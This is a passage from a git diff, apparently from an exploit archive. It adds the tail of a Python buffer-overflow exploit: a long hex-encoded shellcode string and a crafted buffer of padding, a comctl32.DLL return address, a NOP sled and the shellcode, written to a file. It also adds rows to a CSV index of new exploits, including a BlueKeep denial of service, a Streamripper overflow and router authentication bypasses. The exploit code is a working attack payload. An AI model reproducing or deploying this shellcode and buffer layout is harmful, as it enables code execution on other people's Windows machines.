+"\x39\x6f\x7a\x75\x6f\x48\x6e\x70\x73\x31\x35\x50\x53\x30" +
+"\x45\x79\x68\x44\x43\x64\x46\x30\x32\x48\x56\x49\x6d\x50" +
+"\x72\x4b\x33\x30\x39\x6f\x39\x45\x50\x50\x52\x70\x76\x30" +
+"\x36\x30\x67\x30\x46\x30\x53\x70\x72\x70\x51\x78\x49\x7a" +
+"\x56\x6f\x39\x4f\x49\x70\x69\x6f\x78\x55\x6b\x39\x6b\x77" +
+"\x62\x48\x49\x50\x6f\x58\x54\x78\x53\x36\x50\x68\x73\x32" +
+"\x45\x50\x66\x71\x31\x4c\x4d\x59\x79\x76\x42\x4a\x64\x50" +
+"\x72\x76\x62\x77\x65\x38\x6e\x79\x6e\x45\x42\x54\x73\x51" +
+"\x69\x6f\x78\x55\x61\x78\x35\x33\x30\x6d\x51\x74\x57\x70" +
+"\x6b\x39\x4d\x33\x43\x67\x31\x47\x36\x37\x66\x51\x69\x66" +
+"\x71\x7a\x75\x42\x32\x79\x62\x76\x59\x72\x69\x6d\x52\x46" +
+"\x4b\x77\x51\x54\x31\x34\x65\x6c\x77\x71\x55\x51\x6c\x4d" +
+"\x30\x44\x74\x64\x56\x70\x49\x56\x57\x70\x53\x74\x72\x74" +
+"\x32\x70\x42\x76\x50\x56\x70\x56\x51\x56\x32\x76\x42\x6e" +
+"\x66\x36\x33\x66\x73\x63\x66\x36\x45\x38\x64\x39\x58\x4c" +
+"\x55\x6f\x4c\x46\x79\x6f\x79\x45\x6e\x69\x69\x70\x42\x6e" +
+"\x61\x46\x77\x36\x49\x6f\x30\x30\x35\x38\x45\x58\x4c\x47" +
+"\x45\x4d\x51\x70\x79\x6f\x38\x55\x4d\x6b\x4b\x50\x65\x4d" +
+"\x57\x5a\x55\x5a\x73\x58\x49\x36\x4c\x55\x6d\x6d\x4d\x4d" +
+"\x59\x6f\x6a\x75\x77\x4c\x64\x46\x73\x4c\x77\x7a\x4b\x30" +
+"\x59\x6b\x59\x70\x50\x75\x33\x35\x6f\x4b\x61\x57\x46\x73" +
+"\x62\x52\x70\x6f\x61\x7a\x45\x50\x33\x63\x69\x6f\x78\x55" +
+"\x41\x41")
+
+
+#74302E3F comctl32.DLL
+buffer = "A"*256 + "\x3f\x2e\x30\x74" + "\x90"*10 + shellcode + "C"*(260-256-4-10)
+file.write(buffer)
+file.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3e592b65a..7164028fe 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6507,6 +6507,8 @@ id,file,description,date,author,type,platform,port
47102,exploits/windows/dos/47102.txt,"Microsoft DirectWrite / AFDKO - NULL Pointer Dereferences in OpenType Font Handling While Accessing Empty dynarrays",2019-07-10,"Google Security Research",dos,windows,
47103,exploits/windows/dos/47103.txt,"Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Empty ROS Strings",2019-07-10,"Google Security Research",dos,windows,
47113,exploits/windows/dos/47113.txt,"Microsoft Font Subsetting - DLL Heap Corruption in ComputeFormat4CmapData",2019-07-12,"Google Security Research",dos,windows,
+47119,exploits/android/dos/47119.txt,"Android 7 - 9 VideoPlayer - 'ihevcd_parse_pps' Out-of-Bounds Write",2019-07-15,"Marcin Kozlowski",dos,android,
+47120,exploits/windows/dos/47120.rb,"Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service (Metasploit)",2019-07-15,"RAMELLA Sebastien",dos,windows,3389
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10589,6 +10591,7 @@ id,file,description,date,author,type,platform,port
47072,exploits/linux/local/47072.rb,"Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)",2019-07-03,Metasploit,local,linux,
47105,exploits/windows/local/47105.py,"SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow",2019-07-11,xerubus,local,windows,
47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows,
+47116,exploits/windows/local/47116.py,"Streamripper 2.6 - 'Song Pattern' Buffer Overflow",2019-07-15,"Andrey Stoykov",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41493,3 +41496,6 @@ id,file,description,date,author,type,platform,port
47110,exploits/java/webapps/47110.py,"Sahi Pro 8.0.0 - Remote Command Execution",2019-07-12,AkkuS,webapps,java,
47111,exploits/java/webapps/47111.txt,"Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting",2019-07-12,"Ishaq Mohammed",webapps,java,
47112,exploits/cgi/webapps/47112.py,"Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution",2019-07-12,"Chris Lyne",webapps,cgi,
+47117,exploits/hardware/webapps/47117.txt,"NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass",2019-07-15,Wadeek,webapps,hardware,
+47118,exploits/hardware/webapps/47118.txt,"CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities",2019-07-15,Ramikan,webapps,hardware,
+47121,exploits/php/webapps/47121.txt,"FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion",2019-07-15,"Mohammed Althibyani",webapps,php,80